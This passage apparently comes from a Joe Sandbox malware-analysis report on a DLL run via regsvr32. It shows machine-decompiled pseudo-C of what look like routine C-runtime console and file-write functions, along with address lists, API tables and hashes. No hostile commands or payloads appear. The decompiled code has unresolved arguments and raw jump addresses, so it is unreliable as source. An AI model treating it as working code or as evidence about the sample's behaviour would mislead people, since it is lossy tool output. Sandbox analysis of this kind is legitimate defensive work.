                                                                                                          				intOrPtr* _t278;
                                                                                                          				intOrPtr* _t285;
                                                                                                          				long long _t287;
                                                                                                          				long long _t313;
                                                                                                          				void* _t321;
                                                                                                          				long long _t322;
                                                                                                          				void* _t323;
                                                                                                          				long long _t324;
                                                                                                          				long long _t326;
                                                                                                          				signed char* _t327;
                                                                                                          				signed char* _t328;
                                                                                                          				signed char* _t329;
                                                                                                          				void* _t330;
                                                                                                          				void* _t331;
                                                                                                          				void* _t332;
                                                                                                          				signed long long _t333;
                                                                                                          				intOrPtr _t336;
                                                                                                          				intOrPtr _t339;
                                                                                                          				void* _t341;
                                                                                                          				signed long long _t343;
                                                                                                          				signed long long _t345;
                                                                                                          				long long _t354;
                                                                                                          				void* _t358;
                                                                                                          				long long _t359;
                                                                                                          				signed long long _t362;
                                                                                                          				char _t363;
                                                                                                          				signed long long _t364;
                                                                                                          				void* _t367;
                                                                                                          				signed char* _t368;
                                                                                                          				signed long long _t370;
                                                                                                          
                                                                                                          				_t261 = _t332;
                                                                                                          				_t331 = _t261 - 0x57;
                                                                                                          				_t333 = _t332 - 0xd0;
                                                                                                          				 *((long long*)(_t331 - 9)) = 0xfffffffe;
                                                                                                          				 *((long long*)(_t261 + 8)) = __rbx;
                                                                                                          				_t262 =  *0x80021010; // 0x268a0197523d
                                                                                                          				 *(_t331 + 0x17) = _t262 ^ _t333;
                                                                                                          				 *((long long*)(_t331 - 0x41)) = __r8;
                                                                                                          				_t278 = __rcx;
                                                                                                          				 *((long long*)(_t331 - 0x59)) =  *((intOrPtr*)(_t331 + 0x7f));
                                                                                                          				_t362 = __edx >> 6;
                                                                                                          				 *(_t331 - 0x39) = _t362;
                                                                                                          				_t370 = __edx + __edx * 8;
                                                                                                          				_t267 =  *((intOrPtr*)( *((intOrPtr*)(0x180000000 + 0x227f0 + _t362 * 8)) + 0x28 + _t370 * 8));
                                                                                                          				 *((long long*)(_t331 - 0x19)) = _t267;
                                                                                                          				r12d = r9d;
                                                                                                          				_t359 = _t358 + __r8;
                                                                                                          				 *((long long*)(_t331 - 0x61)) = _t359;
                                                                                                          				 *((intOrPtr*)(_t331 - 0x49)) = GetConsoleOutputCP();
                                                                                                          				if ( *((intOrPtr*)( *((intOrPtr*)(_t331 - 0x59)) + 0x28)) != dil) goto 0x8000d658;
                                                                                                          				0x80006f60();
                                                                                                          				_t208 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t331 - 0x59)) + 0x18)) + 0xc));
                                                                                                          				 *((intOrPtr*)(_t331 - 0x45)) = _t208;
                                                                                                          				 *((long long*)(__rcx)) = _t267;
                                                                                                          				 *((intOrPtr*)(__rcx + 8)) = 0;
                                                                                                          				if ( *((intOrPtr*)(_t331 - 0x41)) - _t359 >= 0) goto 0x8000da03;
                                                                                                          				_t343 = __edx >> 6;
                                                                                                          				 *(_t331 - 0x11) = _t343;
                                                                                                          				 *((char*)(_t331 - 0x71)) =  *((intOrPtr*)(__r8));
                                                                                                          				 *((intOrPtr*)(_t331 - 0x6d)) = 0;
                                                                                                          				r12d = 1;
                                                                                                          				if (_t208 != 0xfde9) goto 0x8000d81d;
                                                                                                          				_t285 = 0x3e + _t370 * 8 +  *((intOrPtr*)(0x180000000 + 0x227f0 + _t343 * 8));
                                                                                                          				if ( *_t285 == dil) goto 0x8000d6ca;
                                                                                                          				_t367 = _t324 + 1;
                                                                                                          				if (_t367 - 5 < 0) goto 0x8000d6b7;
                                                                                                          				if (_t367 <= 0) goto 0x8000d7b3;
                                                                                                          				r12d =  *((char*)(_t285 + 0x1800218d1));
                                                                                                          				r12d = r12d + 1;
                                                                                                          				_t183 = r12d - 1;
                                                                                                          				 *((intOrPtr*)(_t331 - 0x51)) = _t183;
                                                                                                          				_t336 = _t183;
                                                                                                          				if (_t336 -  *((intOrPtr*)(_t331 - 0x61)) - __r8 > 0) goto 0x8000d980;
                                                                                                          				_t287 = _t324;
                                                                                                          				 *((char*)(_t331 + _t287 - 1)) =  *((intOrPtr*)(0x3e + _t370 * 8 +  *((intOrPtr*)(0x180000000 + 0x227f0 + _t343 * 8))));
                                                                                                          				if (_t287 + 1 - _t367 < 0) goto 0x8000d71b;
                                                                                                          				if (_t336 <= 0) goto 0x8000d74b;
                                                                                                          				0x80004b30();
                                                                                                          				_t354 =  *((intOrPtr*)(_t331 - 0x59));
                                                                                                          				_t313 = _t324;
                                                                                                          				 *((intOrPtr*)( *((intOrPtr*)(0x180000000 + 0x227f0 + _t362 * 8)) + _t313 + 0x3e + _t370 * 8)) = dil;
                                                                                                          				if (_t313 + 1 - _t367 < 0) goto 0x8000d74e;
                                                                                                          				 *((long long*)(_t331 - 0x31)) = _t324;
                                                                                                          				_t269 = _t331 - 1;
                                                                                                          				 *((long long*)(_t331 - 0x29)) = _t269;
                                                                                                          				_t187 = (0 | r12d == 0x00000004) + 1;
                                                                                                          				r12d = _t187;
                                                                                                          				r8d = _t187;
                                                                                                          				 *((long long*)(_t333 + 0x20)) = _t354;
                                                                                                          				E0000000118000E384(_t269, __rcx, _t331 - 0x6d, _t331 - 0x29, _t336, _t331 - 0x31);
                                                                                                          				if (_t269 == 0xffffffff) goto 0x8000da03;
                                                                                                          				_t326 = __r8 +  *((intOrPtr*)(_t331 - 0x51)) - 1;
                                                                                                          				goto 0x8000d8ae;
                                                                                                          				_t363 =  *((char*)(_t269 + 0x1800218d0));
                                                                                                          				_t210 = _t363 + 1;
                                                                                                          				_t270 = _t210;
                                                                                                          				if (_t270 -  *((intOrPtr*)(_t331 - 0x61)) - _t326 > 0) goto 0x8000d9ae;
                                                                                                          				 *((long long*)(_t331 - 0x51)) = _t324;
                                                                                                          				 *((long long*)(_t331 - 0x21)) = _t326;
                                                                                                          				_t194 = (0 | _t210 == 0x00000004) + 1;
                                                                                                          				r14d = _t194;
                                                                                                          				r8d = _t194;
                                                                                                          				 *((long long*)(_t333 + 0x20)) = _t354;
                                                                                                          				_t345 = _t331 - 0x51;
                                                                                                          				E0000000118000E384(_t270, _t278, _t331 - 0x6d, _t331 - 0x21,  *((intOrPtr*)(_t331 - 0x61)) - _t326, _t345);
                                                                                                          				if (_t270 == 0xffffffff) goto 0x8000da03;
                                                                                                          				_t327 = _t326 + _t363;
                                                                                                          				r12d = r14d;
                                                                                                          				_t364 =  *(_t331 - 0x39);
                                                                                                          				goto 0x8000d8ae;
                                                                                                          				_t339 =  *((intOrPtr*)(0x180000000 + 0x227f0 + _t364 * 8));
                                                                                                          				_t211 =  *(_t339 + 0x3d + _t370 * 8);
                                                                                                          				if ((_t211 & 0x00000004) == 0) goto 0x8000d850;
                                                                                                          				 *((char*)(_t331 + 7)) =  *((intOrPtr*)(_t339 + 0x3e + _t370 * 8));
                                                                                                          				 *((char*)(_t331 + 8)) =  *_t327;
                                                                                                          				 *(_t339 + 0x3d + _t370 * 8) = _t211 & 0x000000fb;
                                                                                                          				r8d = 2;
                                                                                                          				goto 0x8000d899;
                                                                                                          				r9d =  *_t327 & 0x000000ff;
                                                                                                          				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t354 + 0x18)))) + _t345 * 2)) >= 0) goto 0x8000d893;
                                                                                                          				_t368 =  &(_t327[1]);
                                                                                                          				if (_t368 -  *((intOrPtr*)(_t331 - 0x61)) >= 0) goto 0x8000d9e0;
                                                                                                          				r8d = 2;
                                                                                                          				if (E0000000118000B5FC(_t211 & 0x000000fb, __ebp, _t278, _t331 - 0x6d, _t327, _t324, _t327, _t331, _t339, _t354) == 0xffffffff) goto 0x8000da03;
                                                                                                          				_t328 = _t368;
                                                                                                          				goto 0x8000d8ae;
                                                                                                          				_t199 = E0000000118000B5FC(_t211 & 0x000000fb, __ebp, _t278, _t331 - 0x6d, _t328, _t324, _t328, _t331, _t359, _t354);
                                                                                                          				if (_t199 == 0xffffffff) goto 0x8000da03;
                                                                                                          				_t329 =  &(_t328[1]);
                                                                                                          				 *((long long*)(_t333 + 0x38)) = _t324;
                                                                                                          				 *((long long*)(_t333 + 0x30)) = _t324;
                                                                                                          				 *((intOrPtr*)(_t333 + 0x28)) = 5;
                                                                                                          				_t272 = _t331 + 0xf;
                                                                                                          				 *((long long*)(_t333 + 0x20)) = _t272;
                                                                                                          				r9d = r12d;
                                                                                                          				_t341 = _t331 - 0x6d;
                                                                                                          				E0000000118000A154();
                                                                                                          				r14d = _t199;
                                                                                                          				if (_t199 == 0) goto 0x8000da03;
                                                                                                          				 *((long long*)(_t333 + 0x20)) = _t324;
                                                                                                          				r8d = _t199;
                                                                                                          				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x8000d9fb;
                                                                                                          				 *((intOrPtr*)(_t278 + 4)) = __esi -  *((intOrPtr*)(_t331 - 0x41)) +  *((intOrPtr*)(_t278 + 8));
                                                                                                          				if ( *((intOrPtr*)(_t331 - 0x69)) - r14d < 0) goto 0x8000da03;
                                                                                                          				if ( *((char*)(_t331 - 0x71)) != 0xa) goto 0x8000d966;
                                                                                                          				 *((short*)(_t331 - 0x71)) = 0xd;
                                                                                                          				 *((long long*)(_t333 + 0x20)) = _t324;
                                                                                                          				_t130 = _t272 - 0xc; // 0x1
                                                                                                          				r8d = _t130;
                                                                                                          				_t321 = _t331 - 0x71;
                                                                                                          				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x8000d9fb;
                                                                                                          				if ( *((intOrPtr*)(_t331 - 0x69)) - 1 < 0) goto 0x8000da03;
                                                                                                          				 *((intOrPtr*)(_t278 + 8)) =  *((intOrPtr*)(_t278 + 8)) + 1;
                                                                                                          				 *((intOrPtr*)(_t278 + 4)) =  *((intOrPtr*)(_t278 + 4)) + 1;
                                                                                                          				if (_t329 -  *((intOrPtr*)(_t331 - 0x61)) >= 0) goto 0x8000da03;
                                                                                                          				goto 0x8000d681;
                                                                                                          				if (_t321 <= 0) goto 0x8000d9a9;
                                                                                                          				_t330 = _t329 - _t368;
                                                                                                          				 *((char*)( *((intOrPtr*)(0x180000000 + 0x227f0 + _t364 * 8)) + _t368 + 0x3e + _t370 * 8)) =  *((intOrPtr*)(_t330 + _t368));
                                                                                                          				if (1 - _t321 < 0) goto 0x8000d988;
                                                                                                          				 *((intOrPtr*)(_t278 + 4)) =  *((intOrPtr*)(_t278 + 4)) +  *((intOrPtr*)(_t278 + 4));
                                                                                                          				goto 0x8000da03;
                                                                                                          				if (_t341 <= 0) goto 0x8000d9da;
                                                                                                          				_t322 = _t324;
                                                                                                          				 *((char*)( *((intOrPtr*)(0x180000000 + 0x227f0 +  *(_t331 - 0x39) * 8)) + _t322 + 0x3e + _t370 * 8)) =  *((intOrPtr*)(_t322 + _t330));
                                                                                                          				_t323 = _t322 + 1;
                                                                                                          				if (2 - _t341 < 0) goto 0x8000d9ba;
                                                                                                          				 *((intOrPtr*)(_t278 + 4)) =  *((intOrPtr*)(_t278 + 4)) + r8d;
                                                                                                          				goto 0x8000da03;
                                                                                                          				 *((intOrPtr*)(_t341 + 0x3e + _t370 * 8)) = r9b;
                                                                                                          				 *( *((intOrPtr*)(0x180000000 + 0x227f0 + _t364 * 8)) + 0x3d + _t370 * 8) =  *( *((intOrPtr*)(0x180000000 + 0x227f0 + _t364 * 8)) + 0x3d + _t370 * 8) | 0x00000004;
                                                                                                          				_t173 = _t323 + 1; // 0x1
                                                                                                          				 *((intOrPtr*)(_t278 + 4)) = _t173;
                                                                                                          				goto 0x8000da03;
                                                                                                          				 *_t278 = GetLastError();
                                                                                                          				return E000000011800010B0(_t206,  *((intOrPtr*)(_t331 - 0x45)),  *(_t331 + 0x17) ^ _t333);
                                                                                                          			}

















































                                                                                                          0x18000d5b8
                                                                                                          0x18000d5c6
                                                                                                          0x18000d5ca
                                                                                                          0x18000d5d1
                                                                                                          0x18000d5d9
                                                                                                          0x18000d5dd
                                                                                                          0x18000d5e7
                                                                                                          0x18000d5ee
                                                                                                          0x18000d5f5
                                                                                                          0x18000d5fc
                                                                                                          0x18000d606
                                                                                                          0x18000d60a
                                                                                                          0x18000d618
                                                                                                          0x18000d624
                                                                                                          0x18000d629
                                                                                                          0x18000d62d
                                                                                                          0x18000d630
                                                                                                          0x18000d633
                                                                                                          0x18000d63d
                                                                                                          0x18000d64a
                                                                                                          0x18000d64f
                                                                                                          0x18000d65c
                                                                                                          0x18000d65f
                                                                                                          0x18000d664
                                                                                                          0x18000d667
                                                                                                          0x18000d66e
                                                                                                          0x18000d677
                                                                                                          0x18000d67b
                                                                                                          0x18000d683
                                                                                                          0x18000d686
                                                                                                          0x18000d689
                                                                                                          0x18000d69c
                                                                                                          0x18000d6af
                                                                                                          0x18000d6ba
                                                                                                          0x18000d6be
                                                                                                          0x18000d6c8
                                                                                                          0x18000d6cd
                                                                                                          0x18000d6e1
                                                                                                          0x18000d6ea
                                                                                                          0x18000d6f0
                                                                                                          0x18000d6f2
                                                                                                          0x18000d6fc
                                                                                                          0x18000d702
                                                                                                          0x18000d708
                                                                                                          0x18000d71d
                                                                                                          0x18000d72a
                                                                                                          0x18000d72f
                                                                                                          0x18000d73b
                                                                                                          0x18000d740
                                                                                                          0x18000d74b
                                                                                                          0x18000d759
                                                                                                          0x18000d764
                                                                                                          0x18000d766
                                                                                                          0x18000d76a
                                                                                                          0x18000d76e
                                                                                                          0x18000d77b
                                                                                                          0x18000d77d
                                                                                                          0x18000d780
                                                                                                          0x18000d783
                                                                                                          0x18000d794
                                                                                                          0x18000d79d
                                                                                                          0x18000d7ab
                                                                                                          0x18000d7ae
                                                                                                          0x18000d7b6
                                                                                                          0x18000d7bf
                                                                                                          0x18000d7ca
                                                                                                          0x18000d7d0
                                                                                                          0x18000d7d6
                                                                                                          0x18000d7da
                                                                                                          0x18000d7e6
                                                                                                          0x18000d7e8
                                                                                                          0x18000d7eb
                                                                                                          0x18000d7ee
                                                                                                          0x18000d7f3
                                                                                                          0x18000d7ff
                                                                                                          0x18000d808
                                                                                                          0x18000d80e
                                                                                                          0x18000d811
                                                                                                          0x18000d814
                                                                                                          0x18000d818
                                                                                                          0x18000d81d
                                                                                                          0x18000d825
                                                                                                          0x18000d82d
                                                                                                          0x18000d834
                                                                                                          0x18000d839
                                                                                                          0x18000d83f
                                                                                                          0x18000d844
                                                                                                          0x18000d84e
                                                                                                          0x18000d850
                                                                                                          0x18000d860
                                                                                                          0x18000d862
                                                                                                          0x18000d86a
                                                                                                          0x18000d873
                                                                                                          0x18000d888
                                                                                                          0x18000d88e
                                                                                                          0x18000d891
                                                                                                          0x18000d8a0
                                                                                                          0x18000d8a8
                                                                                                          0x18000d8ae
                                                                                                          0x18000d8b1
                                                                                                          0x18000d8b6
                                                                                                          0x18000d8bb
                                                                                                          0x18000d8c3
                                                                                                          0x18000d8c7
                                                                                                          0x18000d8cc
                                                                                                          0x18000d8cf
                                                                                                          0x18000d8d8
                                                                                                          0x18000d8dd
                                                                                                          0x18000d8e2
                                                                                                          0x18000d8e8
                                                                                                          0x18000d8f1
                                                                                                          0x18000d907
                                                                                                          0x18000d915
                                                                                                          0x18000d91c
                                                                                                          0x18000d926
                                                                                                          0x18000d92d
                                                                                                          0x18000d931
                                                                                                          0x18000d93a
                                                                                                          0x18000d93a
                                                                                                          0x18000d93e
                                                                                                          0x18000d94d
                                                                                                          0x18000d957
                                                                                                          0x18000d95d
                                                                                                          0x18000d960
                                                                                                          0x18000d96a
                                                                                                          0x18000d97b
                                                                                                          0x18000d983
                                                                                                          0x18000d985
                                                                                                          0x18000d997
                                                                                                          0x18000d9a7
                                                                                                          0x18000d9a9
                                                                                                          0x18000d9ac
                                                                                                          0x18000d9b1
                                                                                                          0x18000d9b3
                                                                                                          0x18000d9c8
                                                                                                          0x18000d9cf
                                                                                                          0x18000d9d8
                                                                                                          0x18000d9da
                                                                                                          0x18000d9de
                                                                                                          0x18000d9e0
                                                                                                          0x18000d9ed
                                                                                                          0x18000d9f3
                                                                                                          0x18000d9f6
                                                                                                          0x18000d9f9
                                                                                                          0x18000da01
                                                                                                          0x18000da2c

                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435175242.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                          • Associated: 00000007.00000002.435170036.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435186833.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435222239.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435229461.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                          • String ID:
                                                                                                          • API String ID: 2718003287-0
                                                                                                          • Opcode ID: 6feae5b9fbf0fd58da801fa267745876ae53b7eaab871f0ae10c7fb0fe539764
                                                                                                          • Instruction ID: d53985ea959d49848d9070d6669198272c686acab0006873b77d48ca537a322a
                                                                                                          • Opcode Fuzzy Hash: 6feae5b9fbf0fd58da801fa267745876ae53b7eaab871f0ae10c7fb0fe539764
                                                                                                          • Instruction Fuzzy Hash: 1CD1E332B18A8889E752CFA9D4403EC3BB1F3597D8F148216EE5D97B99DE34C60AC750
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 28%
                                                                                                          			E0000000118000DEE0(void* __ebx, signed int __ecx, void* __esi, void* __ebp, void* __rax, void* __rcx, signed short* __rdx, void* __r8, signed int __r9, void* __r10) {
                                                                                                          				signed long long _v88;
                                                                                                          				void* _v96;
                                                                                                          				void* _v108;
                                                                                                          				signed int _v112;
                                                                                                          				intOrPtr _v120;
                                                                                                          				signed int _v124;
                                                                                                          				long _v128;
                                                                                                          				signed int _v136;
                                                                                                          				long long _v144;
                                                                                                          				signed int _v152;
                                                                                                          				void* __rbx;
                                                                                                          				void* __rsi;
                                                                                                          				void* __rbp;
                                                                                                          				signed short _t99;
                                                                                                          				void* _t107;
                                                                                                          				long _t116;
                                                                                                          				signed int _t117;
                                                                                                          				void* _t122;
                                                                                                          				signed short _t127;
                                                                                                          				signed int _t130;
                                                                                                          				signed short _t133;
                                                                                                          				signed short _t159;
                                                                                                          				signed short _t167;
                                                                                                          				signed long long _t180;
                                                                                                          				signed int _t184;
                                                                                                          				signed short* _t197;
                                                                                                          				signed int _t204;
                                                                                                          				signed int _t205;
                                                                                                          				signed short* _t206;
                                                                                                          				void* _t208;
                                                                                                          				signed long long _t220;
                                                                                                          				void* _t221;
                                                                                                          				signed long long _t222;
                                                                                                          				signed long long _t223;
                                                                                                          				void* _t224;
                                                                                                          				signed short* _t226;
                                                                                                          
                                                                                                          				_t197 = __rdx;
                                                                                                          				_t122 = __ebx;
                                                                                                          				r14d = r8d;
                                                                                                          				_t184 = __r9;
                                                                                                          				_t206 = __rdx;
                                                                                                          				if (r8d == 0) goto 0x8000e1d3;
                                                                                                          				if (__rdx != 0) goto 0x8000df47;
                                                                                                          				 *((char*)(__r9 + 0x38)) = 1;
                                                                                                          				r8d = 0;
                                                                                                          				 *((intOrPtr*)(__r9 + 0x34)) = 0;
                                                                                                          				 *((char*)(__r9 + 0x30)) = 1;
                                                                                                          				 *((intOrPtr*)(__r9 + 0x2c)) = 0x16;
                                                                                                          				r9d = 0;
                                                                                                          				_v144 = __r9;
                                                                                                          				_v152 = _t205;
                                                                                                          				E000000011800084EC(__rax, __r9, __rcx, __rdx, __rdx, _t208, __r8);
                                                                                                          				goto 0x8000e1d5;
                                                                                                          				_t220 = __ecx >> 6;
                                                                                                          				_v88 = _t220;
                                                                                                          				_t223 = __ecx + __ecx * 8;
                                                                                                          				_t99 =  *((intOrPtr*)(0x800227f0 + 0x39 + _t223 * 8));
                                                                                                          				_v136 = _t99;
                                                                                                          				if (_t99 - 1 - 1 > 0) goto 0x8000df7e;
                                                                                                          				if (( !r14d & 0x00000001) == 0) goto 0x8000df10;
                                                                                                          				if (( *( *((intOrPtr*)(0x800227f0 + _t220 * 8)) + 0x38 + _t223 * 8) & 0x00000020) == 0) goto 0x8000df94;
                                                                                                          				_t23 = _t197 + 2; // 0x2
                                                                                                          				r8d = _t23;
                                                                                                          				E0000000118000E958(r15d);
                                                                                                          				_v112 = _t205;
                                                                                                          				if (E0000000118000E2E0(r15d, __ecx) == 0) goto 0x8000e0c3;
                                                                                                          				if ( *( *((intOrPtr*)(0x800227f0 + _t220 * 8)) + 0x38 + _t223 * 8) - dil >= 0) goto 0x8000e0c3;
                                                                                                          				if ( *((intOrPtr*)(__r9 + 0x28)) != dil) goto 0x8000dfd3;
                                                                                                          				0x80006f60();
                                                                                                          				if ( *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x18)) + 0x138)) != _t205) goto 0x8000dfef;
                                                                                                          				_t180 =  *((intOrPtr*)(0x800227f0 + _t220 * 8));
                                                                                                          				if ( *((intOrPtr*)(_t180 + 0x39 + _t223 * 8)) == dil) goto 0x8000e0c3;
                                                                                                          				if (GetConsoleMode(??, ??) == 0) goto 0x8000e0bc;
                                                                                                          				_t127 = _v136;
                                                                                                          				_t159 = _t127;
                                                                                                          				if (_t159 == 0) goto 0x8000e099;
                                                                                                          				if (_t159 == 0) goto 0x8000e024;
                                                                                                          				if (_t127 - 1 != 1) goto 0x8000e15d;
                                                                                                          				_t221 = _t206 + _t224;
                                                                                                          				_v128 = _t205;
                                                                                                          				_t226 = _t206;
                                                                                                          				if (_t206 - _t221 >= 0) goto 0x8000e090;
                                                                                                          				r14d = _v124;
                                                                                                          				_v136 =  *_t226 & 0x0000ffff;
                                                                                                          				_t107 = E0000000118000E960( *_t226 & 0xffff);
                                                                                                          				_t130 = _v136 & 0x0000ffff;
                                                                                                          				if (_t107 != _t130) goto 0x8000e087;
                                                                                                          				r14d = r14d + 2;
                                                                                                          				_v124 = r14d;
                                                                                                          				if (_t130 != 0xa) goto 0x8000e07c;
                                                                                                          				if (E0000000118000E960(0xd) != 0xd) goto 0x8000e087;
                                                                                                          				r14d = r14d + 1;
                                                                                                          				_v124 = r14d;
                                                                                                          				if ( &(_t226[1]) - _t221 >= 0) goto 0x8000e090;
                                                                                                          				goto 0x8000e038;
                                                                                                          				_v128 = GetLastError();
                                                                                                          				_t222 = _v88;
                                                                                                          				goto 0x8000e153;
                                                                                                          				r9d = r14d;
                                                                                                          				_v152 = __r9;
                                                                                                          				E0000000118000D5B8(_t109, r15d, __esi, __ebp, __r9,  &_v128, _t206);
                                                                                                          				asm("movsd xmm0, [eax]");
                                                                                                          				goto 0x8000e158;
                                                                                                          				if ( *((intOrPtr*)( *((intOrPtr*)(0x800227f0 + _t222 * 8)) + 0x38 + _t223 * 8)) - dil >= 0) goto 0x8000e120;
                                                                                                          				_t133 = _v136;
                                                                                                          				_t167 = _t133;
                                                                                                          				if (_t167 == 0) goto 0x8000e10c;
                                                                                                          				if (_t167 == 0) goto 0x8000e0f8;
                                                                                                          				if (_t133 - 1 != 1) goto 0x8000e164;
                                                                                                          				r9d = r14d;
                                                                                                          				E0000000118000DB34(_t122, r15d, _t180, _t184,  &_v128, _t208, _t206);
                                                                                                          				goto 0x8000e0b0;
                                                                                                          				r9d = r14d;
                                                                                                          				E0000000118000DC50(r15d,  *((intOrPtr*)(_t180 + 8)), _t180, _t184,  &_v128, _t208, _t206);
                                                                                                          				goto 0x8000e0b0;
                                                                                                          				r9d = r14d;
                                                                                                          				E0000000118000DA30(_t122, r15d, _t180, _t184,  &_v128, _t208, _t206);
                                                                                                          				goto 0x8000e0b0;
                                                                                                          				r8d = r14d;
                                                                                                          				_v152 = _v152 & _t180;
                                                                                                          				_v128 = _t180;
                                                                                                          				_v120 = 0;
                                                                                                          				if (WriteFile(??, ??, ??, ??, ??) != 0) goto 0x8000e150;
                                                                                                          				_t116 = GetLastError();
                                                                                                          				_v128 = _t116;
                                                                                                          				asm("movsd xmm0, [ebp-0x40]");
                                                                                                          				asm("movsd [ebp-0x30], xmm0");
                                                                                                          				if (_t116 != 0) goto 0x8000e1cc;
                                                                                                          				_t117 = _v112;
                                                                                                          				if (_t117 == 0) goto 0x8000e1a3;
                                                                                                          				if (_t117 != 5) goto 0x8000e193;
                                                                                                          				 *((char*)(_t184 + 0x30)) = 1;
                                                                                                          				 *((intOrPtr*)(_t184 + 0x2c)) = 9;
                                                                                                          				 *((char*)(_t184 + 0x38)) = 1;
                                                                                                          				 *(_t184 + 0x34) = _t117;
                                                                                                          				goto 0x8000df3f;
                                                                                                          				_t204 = _t184;
                                                                                                          				E000000011800086B0(_v112, _t204);
                                                                                                          				goto 0x8000df3f;
                                                                                                          				if (( *( *((intOrPtr*)(_t204 + _t222 * 8)) + 0x38 + _t223 * 8) & 0x00000040) == 0) goto 0x8000e1b4;
                                                                                                          				if ( *_t206 == 0x1a) goto 0x8000e1d3;
                                                                                                          				 *(_t184 + 0x34) =  *(_t184 + 0x34) & 0x00000000;
                                                                                                          				 *((char*)(_t184 + 0x30)) = 1;
                                                                                                          				 *((intOrPtr*)(_t184 + 0x2c)) = 0x1c;
                                                                                                          				 *((char*)(_t184 + 0x38)) = 1;
                                                                                                          				goto 0x8000df3f;
                                                                                                          				goto 0x8000e1d5;
                                                                                                          				return 0;
                                                                                                          			}







































                                                                                                          0x18000dee0
                                                                                                          0x18000dee0
                                                                                                          0x18000def6
                                                                                                          0x18000defc
                                                                                                          0x18000deff
                                                                                                          0x18000df05
                                                                                                          0x18000df0e
                                                                                                          0x18000df10
                                                                                                          0x18000df15
                                                                                                          0x18000df18
                                                                                                          0x18000df1e
                                                                                                          0x18000df25
                                                                                                          0x18000df2d
                                                                                                          0x18000df30
                                                                                                          0x18000df35
                                                                                                          0x18000df3a
                                                                                                          0x18000df42
                                                                                                          0x18000df57
                                                                                                          0x18000df5b
                                                                                                          0x18000df5f
                                                                                                          0x18000df67
                                                                                                          0x18000df6c
                                                                                                          0x18000df73
                                                                                                          0x18000df7c
                                                                                                          0x18000df84
                                                                                                          0x18000df8b
                                                                                                          0x18000df8b
                                                                                                          0x18000df8f
                                                                                                          0x18000df97
                                                                                                          0x18000dfa9
                                                                                                          0x18000dfb8
                                                                                                          0x18000dfc2
                                                                                                          0x18000dfc7
                                                                                                          0x18000dfde
                                                                                                          0x18000dfe0
                                                                                                          0x18000dfe9
                                                                                                          0x18000e004
                                                                                                          0x18000e00a
                                                                                                          0x18000e00e
                                                                                                          0x18000e010
                                                                                                          0x18000e019
                                                                                                          0x18000e01e
                                                                                                          0x18000e024
                                                                                                          0x18000e028
                                                                                                          0x18000e02c
                                                                                                          0x18000e032
                                                                                                          0x18000e034
                                                                                                          0x18000e03f
                                                                                                          0x18000e043
                                                                                                          0x18000e048
                                                                                                          0x18000e04f
                                                                                                          0x18000e051
                                                                                                          0x18000e055
                                                                                                          0x18000e05d
                                                                                                          0x18000e071
                                                                                                          0x18000e073
                                                                                                          0x18000e076
                                                                                                          0x18000e083
                                                                                                          0x18000e085
                                                                                                          0x18000e08d
                                                                                                          0x18000e090
                                                                                                          0x18000e094
                                                                                                          0x18000e099
                                                                                                          0x18000e09c
                                                                                                          0x18000e0ab
                                                                                                          0x18000e0b0
                                                                                                          0x18000e0b7
                                                                                                          0x18000e0cc
                                                                                                          0x18000e0ce
                                                                                                          0x18000e0d2
                                                                                                          0x18000e0d4
                                                                                                          0x18000e0d9
                                                                                                          0x18000e0de
                                                                                                          0x18000e0e4
                                                                                                          0x18000e0f1
                                                                                                          0x18000e0f6
                                                                                                          0x18000e0f8
                                                                                                          0x18000e105
                                                                                                          0x18000e10a
                                                                                                          0x18000e10c
                                                                                                          0x18000e119
                                                                                                          0x18000e11e
                                                                                                          0x18000e12b
                                                                                                          0x18000e12e
                                                                                                          0x18000e136
                                                                                                          0x18000e13a
                                                                                                          0x18000e145
                                                                                                          0x18000e147
                                                                                                          0x18000e14d
                                                                                                          0x18000e153
                                                                                                          0x18000e158
                                                                                                          0x18000e16e
                                                                                                          0x18000e170
                                                                                                          0x18000e175
                                                                                                          0x18000e17a
                                                                                                          0x18000e17c
                                                                                                          0x18000e180
                                                                                                          0x18000e187
                                                                                                          0x18000e18b
                                                                                                          0x18000e18e
                                                                                                          0x18000e196
                                                                                                          0x18000e199
                                                                                                          0x18000e19e
                                                                                                          0x18000e1ad
                                                                                                          0x18000e1b2
                                                                                                          0x18000e1b4
                                                                                                          0x18000e1b8
                                                                                                          0x18000e1bc
                                                                                                          0x18000e1c3
                                                                                                          0x18000e1c7
                                                                                                          0x18000e1d1
                                                                                                          0x18000e1e5

                                                                                                          APIs
                                                                                                          • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,000000018000DECB), ref: 000000018000DFFC
                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,000000018000DECB), ref: 000000018000E087
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435175242.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                          • Associated: 00000007.00000002.435170036.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435186833.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435222239.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435229461.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
